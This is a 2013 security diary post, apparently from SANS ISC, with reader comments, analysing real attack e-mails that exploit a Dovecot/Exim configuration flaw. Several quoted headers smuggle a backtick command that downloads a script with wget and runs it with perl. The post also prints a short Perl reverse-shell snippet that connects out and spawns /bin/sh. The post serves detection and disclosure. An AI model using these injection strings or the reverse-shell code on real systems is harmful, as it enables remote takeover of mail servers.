Dovecot / Exim Exploit Detects

Published: 2013-07-29
Last Updated: 2013-07-29 01:57:40 UTC
by Johannes Ullrich (Version: 1)
3 comment(s)

Sometimes it doesn't take an IDS to detect an attack, but just reading your e-mail will do. Our read Timo sent along these two e-mails he received, showing exploitation of a recent Dovecot/Exim configuration flaw [1]:

Return-Path: <x`wget${IFS}-O${IFS}/tmp/${IFS}``perl${IFS}/tmp/`>
X-Original-To: postmaster@localhost
Delivered-To: postmaster@localhost
Received: from domain.local ( [])
       by [REMOVED]

Return-Path: <x`wget${IFS}-O${IFS}/tmp/${IFS}``perl${IFS}/tmp/`>
X-Original-To: postmaster@localhost
Delivered-To: postmaster@localhost
Received: from domain.local ( [])
       by [REMOVED]

The actual exploit happens in the "Return-Path" line. If exim is used as a mail server, it can be configured to "pipe" messages to an external program in order to allow for more advanced delivery and filtering options. A common configuration includes the mail devliery agent Dovecot which implements a pop3 and imap server. Sadly, the sample configuration provided to configure Dovecot with Exim passes the string the attacker provided as "MAIL FROM" in the e-mail envelope as a shell parameter without additional validation.

The first script ("exim") is a little one liner shell connecting to port 9 on (reformated for redability)

use Socket;
if(connect(S,sockaddr_in($p,inet_aton($i)))) {
exec("/bin/sh -i");};

The second script  first retrieves a perl script, and then executes it. The perl script does implement a simple IRC client connecting to on port 3303 (right now, this resolves to, but is not responding on port 3303)

For more details, see the writeout by RedTeam Pentesting [2]


Johannes B. Ullrich, Ph.D.
SANS Technology Institute

3 comment(s)


Quick addition: the {IFS} string replaces the white space. iFS is the Unix environment variable for the separator.
Hi Guys,

shortly after Heise report this ( the Server behind ( got shutting down by the Hoster (Strato).

Mon, 29 Jul 2013 17:57:01 +0200 (CEST) i got a new mail ...
Received: from domain.local (unknown [])
for <postmaster@localhost>; Mon, 29 Jul 2013 17:56:35 +0200 (CEST)
Date: Mon, 29 Jul 2013 17:57:01 +0200 (CEST)
From: x`wget${IFS}-O${IFS}/tmp/${IFS}``perl${IFS}/tmp/`
To: undisclosed-recipients:;
The use of IFS is weird. The default value of IFS is the string containing: a space followed by a tab and then a newline.
Would have expected something more like


Diary Archives